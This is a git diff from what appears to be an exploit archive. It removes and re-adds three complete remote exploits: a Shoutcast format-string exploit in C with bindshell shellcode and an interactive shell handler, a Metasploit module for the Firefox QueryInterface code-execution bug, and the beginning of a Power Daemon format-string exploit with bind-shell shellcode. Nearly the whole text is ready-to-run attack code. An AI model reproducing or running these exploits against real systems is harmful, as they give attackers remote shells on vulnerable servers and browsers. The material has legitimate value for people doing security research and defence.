conn(addr, port)) == -1) - return (-1); - printf("[+] Wooohooo we got a shell!\n"); - sockprintf(sock, SHELL_COMMAND"\r\n"); - while(1){ - FD_ZERO(&fds); - FD_SET(0, &fds); - FD_SET(sock, &fds); - - if (select(255, &fds, NULL, NULL, NULL) == -1){ - fprintf(stderr,"[-] sending failed\n"); - close(sock); - exit(1); - } - - memset(buffer, 0x0, sizeof(buffer)); - if (FD_ISSET(sock, &fds)){ - if (recv(sock, buffer, sizeof(buffer), 0) == -1){ - fprintf(stderr, "[-] Connection closed by remote host!\n"); - close(sock); - exit(1); - } - fprintf(stderr, "%s", buffer); - } - - if (FD_ISSET(0, &fds)){ - read(0, buffer, sizeof(buffer)); - write(sock, buffer, strlen(buffer)); - } - } - return 0; -} - - -void status(int i, int retloc){ - static int c=1; - - switch(c){ - case 1: - printf("[|] "); - 
break; - case 2: - printf("[/] "); - break; - case 3: - printf("[-] "); - break; - case 4: - printf("[\\] "); - c = 0; - break; - } - printf("Uploading shellcode[%d] to [%p]\r", i, (void *)retloc); - fflush(stdout); - c++; -} - - -int write_shellcode(struct sockaddr_in addr, int port, int target, int wsleeps){ - char buffer[1024]; - int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock; - - targets[target].retaddr = retloc; - - for(i = 0; i < strlen(shellcode); i++, retloc++){ - if((sock = conn(addr, port)) == -1) - return -1; - - status(i, retloc); - - *((void **)(buffer)) = (void *)((retloc)); - buffer[4] = 0x0; - sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); - - close(sock); - - if(shellcode[i] > 9) - snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i], targets[target].dpa_offset); - else { - memset(buffer, 0x41, shellcode[i]); - snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn", targets[target].dpa_offset); - } - - if((sock = conn(addr, port)) == -1) - return -1; - - sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); - close(sock); -// sleep(1); - usleep(wsleeps * 100000); - } - return 0; - -} - - -int get_target(struct sockaddr_in addr, int port){ - char buffer[1024], *ptr, *ptr2; - int sock, bytes; - - if((sock = conn(addr, port)) == -1){ - printf("failed!\r[-]\n"); - return -2; - } - printf("done!\n"); - - sockprintf(sock, "GET /doesntmatter HTTP/1.1\r\n\r\n"); - - if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){ - printf("[-] Wasnt able to determine version of server, do it yourself!\n"); - return -1; - } - buffer[bytes] = 0x0; - - if(!(ptr = strstr(buffer, "
"))){ - printf("[-] Wasnt able to determine version of server, do it yourself!\n"); - return -1; - } - ptr += 4; - if(!(ptr2 = strstr(ptr, "
"))){ - printf("[-] Wasnt able to determine version of server, do it yourself!\n"); - return -1; - } - *ptr2 = 0x0; - - printf("[!] Version: %s\n", ptr); - - if(strstr(ptr, "Server/Linux v1.9.4")) - return 1; - else if(strstr(ptr, "Server/Linux v1.9.2")) - return 2; - else if(strstr(ptr, "Server/FreeBSD")){ - printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x choose the target yourself!\n"); - return -1; - } else { - printf("[-] Wasnt able to find target for this server!\n"); - return -1; - } - - return -1; -} - - -int main(int argc, char **argv){ - char *hostn = NULL, buffer[1024]; - int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7; - unsigned short ret1, ret2; - struct sockaddr_in addr; - - printf("[!] Shoutcast <= 1.9.4 exploit by crash-x\n"); - - if (argc < 2) - usage(argv[0]); - - while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){ - switch (opt){ - case 'h': - hostn = optarg; - break; - case 'p': - port = atoi(optarg); - if(port > 65535 || port < 1){ - printf("[-] Port %d is invalid\n",port); - return 1; - } - break; - case 't': - target = atoi(optarg); - for(i = 0; targets[i].platform; i++); - if(target >= i){ - printf("[-] Wtf are you trying to target?\n"); - usage(argv[0]); - } - break; - case 's': - sleeps = atoi(optarg); - break; - case 'S': - wsleeps = atoi(optarg); - break; - default: - usage(argv[0]); - } - } - - if(hostn == NULL) - usage(argv[0]); - - resolv(&addr, hostn); - - printf("[!] Connecting to target... "); - fflush(stdout); - if(target == 0){ - if((target = get_target(addr, port)) < 0) - return target; - } else - if(get_target(addr, port) == -2) - exit(-2); - - printf("[!] Targeting: %s\n", targets[target].platform); - - - if(write_shellcode(addr, port, target, wsleeps) != -1) - printf("[+]\n[+] Uploaded shellcode succesful\n"); - else { - printf("[-]\n[-] Wasn't able to upload shellcode, server probably crashed!\n"); - return -1; - } - - printf("[!] 
Writing retaddr [%p] to retloc [%p]\n", (void *)targets[target].retaddr, (void *)targets[target].retloc); - - - if((sock = conn(addr, port)) == -1){ - printf("[-] Connecting failed!\n"); - return -1; - } - memset(buffer, 0x0, sizeof(buffer)); - *((void **)(buffer)) = (void *)(targets[target].retloc); - *((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2); - sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); - close(sock); - - ret1 = (targets[target].retaddr & 0xffff0000) >> 16; - ret2 = (targets[target].retaddr & 0x0000ffff); - - snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn", - ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset); - - if((sock = conn(addr, port)) == -1){ - printf("[-] Connecting failed!\n"); - return -1; - } - sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); - - if(get_shell(addr, shell_port, sleeps) == -1){ - printf("[-] Exploit failed\n"); - return -1; - } - return 1; -} - -// milw0rm.com [2006-01-28] +/* + * Shoutcast <= 1.9.4 exploit by crash-x + * Trys to upload the shellcode to a fixed address + * and execute it. + * + * This exploit was _not_ written bei Simon 'Zodiac' Moser (segfault.ch). 
+ */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SHELL_PORT 7000 +#define SHELL_COMMAND "unset HISTFILE; uname -a; id;" + + +#if 1 +unsigned char shellcode[] = /* bindshell (7000) (Unknown) */ + "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6" + "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50" + "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a" + "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31" + "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0" + "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80" + "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" + "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; +#endif + + +struct targ{ + char *platform; + int retloc; + int retaddr; + int dpa_offset; + +} targets[]= { + { "Try to determine target", 0xdeadbabe, 0xdeadbabe, 123 }, + { "Shoutcast 1.9.4 all Linux distros", 0x0806493c, 0xdeadbabe, 2534 }, // dpa offset stolen from coki and tal0n's exploit + { "Shoutcast 1.9.2 all Linux distros", 0x0806c270, 0xdeadbabe, 2536 }, + { NULL } +}; + + +void usage(char *a){ + int i; + + printf("[-] Usage: %s -h [options]\n", a); + printf("[!] Options:\n"); + printf("\t\t-h\tHostname you want attack (required)\n"); + printf("\t\t-p\tPort of the shoutcast (default: 8000)\n"); + printf("\t\t-t\tTarget (default: 0)\n"); + printf("\t\t-s\tHow long to sleep before try connect to shell in s (default: 1)\n"); + printf("\t\t-S\tHow long to sleep before write the next byte of shellcode to the memory in ms (default: 7)\n"); + printf("[!] 
Targets:\n"); + for(i = 0; targets[i].platform; i++) + printf("\t\t%d\t %s\n", i, targets[i].platform); + exit(1); +} + + +int sockprintf(int sock, const char *s, ...){ + char *ptr; + int bytes; + va_list arg; + va_start(arg, s); + if(vasprintf(&ptr, s, arg) == -1){ +/* free(ptr); do'h shame on me */ + return -1; + } + va_end(arg); + + bytes = send(sock, ptr, strlen(ptr), 0); + free(ptr); + return bytes; +} + + +int resolv(struct sockaddr_in *addr, char *hostn){ + struct hostent *host; + + if (!inet_aton(hostn, &addr->sin_addr)){ + host = gethostbyname(hostn); + if (host == NULL){ + printf("[-] Wasnt able to resolve %s!\n", hostn); + return -1; + } + addr->sin_addr = *(struct in_addr*)host->h_addr; + } + return 0; +} + + +int conn(struct sockaddr_in addr, int port){ + int sock; + + if((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1){ + return -1; + } + + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + + if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){ + return -1; + } + return sock; +} + + +int get_shell(struct sockaddr_in addr, int port, int sleeps){ + int sock; + char buffer[1024]; + fd_set fds; + + signal(SIGINT, SIG_IGN); + + sleep(sleeps); + + if((sock = conn(addr, port)) == -1) + return (-1); + printf("[+] Wooohooo we got a shell!\n"); + sockprintf(sock, SHELL_COMMAND"\r\n"); + while(1){ + FD_ZERO(&fds); + FD_SET(0, &fds); + FD_SET(sock, &fds); + + if (select(255, &fds, NULL, NULL, NULL) == -1){ + fprintf(stderr,"[-] sending failed\n"); + close(sock); + exit(1); + } + + memset(buffer, 0x0, sizeof(buffer)); + if (FD_ISSET(sock, &fds)){ + if (recv(sock, buffer, sizeof(buffer), 0) == -1){ + fprintf(stderr, "[-] Connection closed by remote host!\n"); + close(sock); + exit(1); + } + fprintf(stderr, "%s", buffer); + } + + if (FD_ISSET(0, &fds)){ + read(0, buffer, sizeof(buffer)); + write(sock, buffer, strlen(buffer)); + } + } + return 0; +} + + +void status(int i, int retloc){ + static int c=1; + + switch(c){ + case 1: + printf("[|] "); + 
break; + case 2: + printf("[/] "); + break; + case 3: + printf("[-] "); + break; + case 4: + printf("[\\] "); + c = 0; + break; + } + printf("Uploading shellcode[%d] to [%p]\r", i, (void *)retloc); + fflush(stdout); + c++; +} + + +int write_shellcode(struct sockaddr_in addr, int port, int target, int wsleeps){ + char buffer[1024]; + int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock; + + targets[target].retaddr = retloc; + + for(i = 0; i < strlen(shellcode); i++, retloc++){ + if((sock = conn(addr, port)) == -1) + return -1; + + status(i, retloc); + + *((void **)(buffer)) = (void *)((retloc)); + buffer[4] = 0x0; + sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); + + close(sock); + + if(shellcode[i] > 9) + snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i], targets[target].dpa_offset); + else { + memset(buffer, 0x41, shellcode[i]); + snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn", targets[target].dpa_offset); + } + + if((sock = conn(addr, port)) == -1) + return -1; + + sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); + close(sock); +// sleep(1); + usleep(wsleeps * 100000); + } + return 0; + +} + + +int get_target(struct sockaddr_in addr, int port){ + char buffer[1024], *ptr, *ptr2; + int sock, bytes; + + if((sock = conn(addr, port)) == -1){ + printf("failed!\r[-]\n"); + return -2; + } + printf("done!\n"); + + sockprintf(sock, "GET /doesntmatter HTTP/1.1\r\n\r\n"); + + if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){ + printf("[-] Wasnt able to determine version of server, do it yourself!\n"); + return -1; + } + buffer[bytes] = 0x0; + + if(!(ptr = strstr(buffer, "
"))){ + printf("[-] Wasnt able to determine version of server, do it yourself!\n"); + return -1; + } + ptr += 4; + if(!(ptr2 = strstr(ptr, "
"))){ + printf("[-] Wasnt able to determine version of server, do it yourself!\n"); + return -1; + } + *ptr2 = 0x0; + + printf("[!] Version: %s\n", ptr); + + if(strstr(ptr, "Server/Linux v1.9.4")) + return 1; + else if(strstr(ptr, "Server/Linux v1.9.2")) + return 2; + else if(strstr(ptr, "Server/FreeBSD")){ + printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x choose the target yourself!\n"); + return -1; + } else { + printf("[-] Wasnt able to find target for this server!\n"); + return -1; + } + + return -1; +} + + +int main(int argc, char **argv){ + char *hostn = NULL, buffer[1024]; + int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7; + unsigned short ret1, ret2; + struct sockaddr_in addr; + + printf("[!] Shoutcast <= 1.9.4 exploit by crash-x\n"); + + if (argc < 2) + usage(argv[0]); + + while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){ + switch (opt){ + case 'h': + hostn = optarg; + break; + case 'p': + port = atoi(optarg); + if(port > 65535 || port < 1){ + printf("[-] Port %d is invalid\n",port); + return 1; + } + break; + case 't': + target = atoi(optarg); + for(i = 0; targets[i].platform; i++); + if(target >= i){ + printf("[-] Wtf are you trying to target?\n"); + usage(argv[0]); + } + break; + case 's': + sleeps = atoi(optarg); + break; + case 'S': + wsleeps = atoi(optarg); + break; + default: + usage(argv[0]); + } + } + + if(hostn == NULL) + usage(argv[0]); + + resolv(&addr, hostn); + + printf("[!] Connecting to target... "); + fflush(stdout); + if(target == 0){ + if((target = get_target(addr, port)) < 0) + return target; + } else + if(get_target(addr, port) == -2) + exit(-2); + + printf("[!] Targeting: %s\n", targets[target].platform); + + + if(write_shellcode(addr, port, target, wsleeps) != -1) + printf("[+]\n[+] Uploaded shellcode succesful\n"); + else { + printf("[-]\n[-] Wasn't able to upload shellcode, server probably crashed!\n"); + return -1; + } + + printf("[!] 
Writing retaddr [%p] to retloc [%p]\n", (void *)targets[target].retaddr, (void *)targets[target].retloc); + + + if((sock = conn(addr, port)) == -1){ + printf("[-] Connecting failed!\n"); + return -1; + } + memset(buffer, 0x0, sizeof(buffer)); + *((void **)(buffer)) = (void *)(targets[target].retloc); + *((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2); + sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1\r\n\r\n", buffer); + close(sock); + + ret1 = (targets[target].retaddr & 0xffff0000) >> 16; + ret2 = (targets[target].retaddr & 0x0000ffff); + + snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn", + ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset); + + if((sock = conn(addr, port)) == -1){ + printf("[-] Connecting failed!\n"); + return -1; + } + sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1\r\n\r\n", buffer); + + if(get_shell(addr, shell_port, sleeps) == -1){ + printf("[-] Exploit failed\n"); + return -1; + } + return 1; +} + +// milw0rm.com [2006-01-28] diff --git a/platforms/linux/remote/1474.pm b/platforms/linux/remote/1474.pm index 9c6bdb85c..27b0c944f 100755 --- a/platforms/linux/remote/1474.pm +++ b/platforms/linux/remote/1474.pm 
@@ -1,273 +1,273 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::firefox_queryinterface_linux;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use IO::Socket::INET;
-use IPC::Open3;
-
-my $advanced =
- {
- 'Gzip' => [1, 'Enable gzip content encoding'],
- 'Chunked' => [1, 'Enable chunked transfer encoding'],
- };
-
-my $info =
- {
- 'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)',
- 'Version' => '$Revision: 1.1 $',
- 'Authors' =>
- [
- 'H D Moore ',
- ],
-
- 'Description' =>
- Pex::Text::Freeform(qq{
- This module exploits a code execution vulnerability in the Mozilla
- Firefox browser. To reliably exploit this vulnerability, we need to fill
- almost a gigabyte of memory with our nop sled and payload. This module has
- been tested on Gentoo Linux with the stock Firefox 1.5.0 package.
-}),
-
- 'Arch' => [ 'x86' ],
- 'OS' => [ 'linux' ],
- 'Priv' => 0,
-
- 'UserOpts' =>
- {
- 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
- 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
- },
-
- 'Payload' =>
- {
- 'Space' => 1024,
- 'BadChars' => "\x00",
- 'Keys' => ['-bind'],
- },
- 'Refs' =>
- [
- ['CVE', '2006-0295'],
- ['BID', '16476'],
- ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
- ],
-
- 'DefaultTarget' => 0,
- 'Targets' =>
- [
- [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ]
- ],
-
- 'Keys' => [ 'mozilla' ],
-
- 'DisclosureDate' => 'Feb 02 2006',
- };
-
-sub new {
- my $class = shift;
- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Exploit
-{
- my $self = shift;
- my $server = IO::Socket::INET->new(
- LocalHost => $self->GetVar('HTTPHOST'),
- LocalPort => $self->GetVar('HTTPPORT'),
- ReuseAddr => 1,
- Listen => 1,
- Proto => 'tcp'
- );
- my $client;
-
- # Did the listener create fail?
- if (not defined($server)) {
- $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
- return;
- }
-
- my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
- Pex::Utils::SourceIP('1.2.3.4') :
- $self->GetVar('HTTPHOST');
-
- $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/");
-
- while (defined($client = $server->accept())) {
- $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
- }
-
- return;
-}
-
-sub HandleHttpClient
-{
- my $self = shift;
- my $fd = shift;
-
- # Set the remote host information
- my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-
-
- # Read the HTTP command
- my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
- my $agent;
-
- # Read in the HTTP headers
- while ((my $line = $fd->RecvLine(10))) {
-
- $line =~ s/^\s+|\s+$//g;
-
- my ($var, $val) = split(/\:/, $line, 2);
-
- # Break out if we reach the end of the headers
- last if (not defined($var) or not defined($val));
-
- $agent = $val if $var =~ /User-Agent/i;
- }
-
- my $os = 'Unknown';
- my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';
-
- $os = 'Linux' if $agent =~ /Linux/i;
- $os = 'Mac OS X' if $agent =~ /OS X/i;
- $os = 'Windows' if $agent =~ /Windows/i;
-
-
- $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
-
- if ($os ne 'Linux') {
- $self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
- } else {
- $self->PrintLine("[*] Sending payload and waiting for execution...");
- }
-
- my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
-
- $fd->Close();
-}
-
-
-sub JSUnescape {
- my $self = shift;
- my $data = shift;
- my $code = '';
-
- # Encode the shellcode via %u sequences for JS's unescape() function
- my $idx = 0;
- while ($idx < length($data) - 1) {
- my $c1 = ord(substr($data, $idx, 1));
- my $c2 = ord(substr($data, $idx+1, 1));
- $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
- $idx += 2;
- }
-
- return $code;
-}
-
-sub GenerateHTML {
- my $self = shift;
- my $target = $self->Targets->[$self->GetVar('TARGET')];
- my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
- my $data = qq#
-
-
- One second please... 
-
-
-
-
-
-#;
- return $data;
-}
-
-sub BuildResponse {
- my ($self, $content) = @_;
-
- my $response =
- "HTTP/1.1 200 OK\r\n" .
- "Content-Type: text/html\r\n";
-
- if ($self->GetVar('Gzip')) {
- $response .= "Content-Encoding: gzip\r\n";
- $content = $self->Gzip($content);
- }
- if ($self->GetVar('Chunked')) {
- $response .= "Transfer-Encoding: chunked\r\n";
- $content = $self->Chunk($content);
- } else {
- $response .= 'Content-Length: ' . length($content) . "\r\n" .
- "Connection: close\r\n";
- }
-
- $response .= "\r\n" . $content;
-
- return $response;
-}
-
-sub Chunk {
- my ($self, $content) = @_;
-
- my $chunked;
- while (length($content)) {
- my $chunk = substr($content, 0, int(rand(10) + 1), '');
- $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
- }
- $chunked .= "0\r\n\r\n";
-
- return $chunked;
-}
-
-sub Gzip {
- my $self = shift;
- my $data = shift;
- my $comp = int(rand(5))+5;
-
- my($wtr, $rdr, $err);
-
- my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
- print $wtr $data;
- close ($wtr);
- local $/;
-
- return (<$rdr>);
-}
-1;
-
-# milw0rm.com [2006-02-07]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::firefox_queryinterface_linux;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket::INET;
+use IPC::Open3;
+
+my $advanced =
+ {
+ 'Gzip' => [1, 'Enable gzip content encoding'],
+ 'Chunked' => [1, 'Enable chunked transfer encoding'],
+ };
+
+my $info =
+ {
+ 'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)',
+ 'Version' => '$Revision: 1.1 $',
+ 'Authors' =>
+ [
+ 'H D Moore ',
+ ],
+
+ 'Description' =>
+ Pex::Text::Freeform(qq{
+ This module exploits a code execution vulnerability in the Mozilla
+ Firefox browser. To reliably exploit this vulnerability, we need to fill
+ almost a gigabyte of memory with our nop sled and payload. This module has
+ been tested on Gentoo Linux with the stock Firefox 1.5.0 package.
+}),
+
+ 'Arch' => [ 'x86' ],
+ 'OS' => [ 'linux' ],
+ 'Priv' => 0,
+
+ 'UserOpts' =>
+ {
+ 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
+ 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+ },
+
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+ 'Keys' => ['-bind'],
+ },
+ 'Refs' =>
+ [
+ ['CVE', '2006-0295'],
+ ['BID', '16476'],
+ ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
+ ],
+
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ]
+ ],
+
+ 'Keys' => [ 'mozilla' ],
+
+ 'DisclosureDate' => 'Feb 02 2006',
+ };
+
+sub new {
+ my $class = shift;
+ my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+ return($self);
+}
+
+sub Exploit
+{
+ my $self = shift;
+ my $server = IO::Socket::INET->new(
+ LocalHost => $self->GetVar('HTTPHOST'),
+ LocalPort => $self->GetVar('HTTPPORT'),
+ ReuseAddr => 1,
+ Listen => 1,
+ Proto => 'tcp'
+ );
+ my $client;
+
+ # Did the listener create fail?
+ if (not defined($server)) {
+ $self->PrintLine("[-] Failed to create local HTTP listener on " . 
$self->GetVar('HTTPPORT'));
+ return;
+ }
+
+ my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
+ Pex::Utils::SourceIP('1.2.3.4') :
+ $self->GetVar('HTTPHOST');
+
+ $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
+ while (defined($client = $server->accept())) {
+ $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+ }
+
+ return;
+}
+
+sub HandleHttpClient
+{
+ my $self = shift;
+ my $fd = shift;
+
+ # Set the remote host information
+ my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+
+
+ # Read the HTTP command
+ my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
+ my $agent;
+
+ # Read in the HTTP headers
+ while ((my $line = $fd->RecvLine(10))) {
+
+ $line =~ s/^\s+|\s+$//g;
+
+ my ($var, $val) = split(/\:/, $line, 2);
+
+ # Break out if we reach the end of the headers
+ last if (not defined($var) or not defined($val));
+
+ $agent = $val if $var =~ /User-Agent/i;
+ }
+
+ my $os = 'Unknown';
+ my $vl = ($agent =~ m/\/1\.5$/) ? 
'Vulnerable' : 'Not Vulnerable';
+
+ $os = 'Linux' if $agent =~ /Linux/i;
+ $os = 'Mac OS X' if $agent =~ /OS X/i;
+ $os = 'Windows' if $agent =~ /Windows/i;
+
+
+ $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
+
+ if ($os ne 'Linux') {
+ $self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
+ } else {
+ $self->PrintLine("[*] Sending payload and waiting for execution...");
+ }
+
+ my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
+
+ $fd->Close();
+}
+
+
+sub JSUnescape {
+ my $self = shift;
+ my $data = shift;
+ my $code = '';
+
+ # Encode the shellcode via %u sequences for JS's unescape() function
+ my $idx = 0;
+ while ($idx < length($data) - 1) {
+ my $c1 = ord(substr($data, $idx, 1));
+ my $c2 = ord(substr($data, $idx+1, 1));
+ $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
+ $idx += 2;
+ }
+
+ return $code;
+}
+
+sub GenerateHTML {
+ my $self = shift;
+ my $target = $self->Targets->[$self->GetVar('TARGET')];
+ my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
+ my $data = qq#
+
+
+ One second please...
+
+
+
+
+
+#;
+ return $data;
+}
+
+sub BuildResponse {
+ my ($self, $content) = @_;
+
+ my $response =
+ "HTTP/1.1 200 OK\r\n" .
+ "Content-Type: text/html\r\n";
+
+ if ($self->GetVar('Gzip')) {
+ $response .= "Content-Encoding: gzip\r\n";
+ $content = $self->Gzip($content);
+ }
+ if ($self->GetVar('Chunked')) {
+ $response .= "Transfer-Encoding: chunked\r\n";
+ $content = $self->Chunk($content);
+ } else {
+ $response .= 'Content-Length: ' . length($content) . "\r\n" .
+ "Connection: close\r\n";
+ }
+
+ $response .= "\r\n" . $content;
+
+ return $response;
+}
+
+sub Chunk {
+ my ($self, $content) = @_;
+
+ my $chunked;
+ while (length($content)) {
+ my $chunk = substr($content, 0, int(rand(10) + 1), '');
+ $chunked .= sprintf('%x', length($chunk)) . 
"\r\n$chunk\r\n";
+ }
+ $chunked .= "0\r\n\r\n";
+
+ return $chunked;
+}
+
+sub Gzip {
+ my $self = shift;
+ my $data = shift;
+ my $comp = int(rand(5))+5;
+
+ my($wtr, $rdr, $err);
+
+ my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+ print $wtr $data;
+ close ($wtr);
+ local $/;
+
+ return (<$rdr>);
+}
+1;
+
+# milw0rm.com [2006-02-07]
diff --git a/platforms/linux/remote/1486.c b/platforms/linux/remote/1486.c
index 7ed0d50e0..775380e39 100755
--- a/platforms/linux/remote/1486.c
+++ b/platforms/linux/remote/1486.c
@@ -1,363 +1,363 @@
-/*
- * gexp-powerd.c
- *
- * Power Daemon v2.0.2 Remote Format String Exploit
- * Copyright (C) 2005 Gotfault Security
- *
- * Bug found and developed by: barros and xgc
- *
- * Original Reference:
- * http://gotfault.net/research/exploit/gexp-powerd.c
- *
- */
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-/*==[ Prototypes ]==*/
-void fatal(char *);
-void Usage(char *);
-void FakeServer(char *,int);
-void ExecuteShell(int);
-int CreateEvilBuffer(int,int,int,int,char *);
-int ConnectToShell(char *,int);
-
-/*==[ Defines ]==*/
-#define DEFAULT_PORT 532 // Default fake server port
-#define BIND_PORT 31337 // Default port to bind
-#define NOPSIZE 50 // Number of NOP
-#define NOP 0x90 // NOP byte
-#define PAD "" // Format string alignment
-#define PORT_OFFSET 29 // Offset to fix the shellcode
-#define STDIN 0
-#define STDOUT 1
-
-/*==[ Targets ]==*/
-struct
-{
- char *Name;
- int Gotaddr;
- int Retaddr;
- int Pop;
-}Targets[] =
- {
- "Power Daemon v2.0.2 @ Slackware 10.0",
- 0x0804c180,
- 0xbffff2d4,
- 17,
-
- "Power Daemon v2.0.2 @ Debian 3.1 Linux",
- 0x0804c198,
- 0xbffff16c,
- 27,
-
- // Finish
- 0,
- 0,
- 0,
- 0
- };
-
-/*==[ Shellcode by Marco Ivaldi ]==*/
-char shellcode[] =
- "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
- "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
- "\x89\xc7\x52\x66\x68"
- "BP" // Port to bind
- "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"
- "\xb0\x66\xb3\x04\xcd\x80"
- "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"
- "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
- "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
-
-int main(int argc, char **argv)
-{
- extern char *optarg;
- extern int optind;
- char opt;
- char *Host = NULL;
- int Port = DEFAULT_PORT;
- int BindPort = BIND_PORT;
- int TargetNumber = -1;
- int Sock,i;
- char EvilBuffer[1024];
- int BufLen;
-
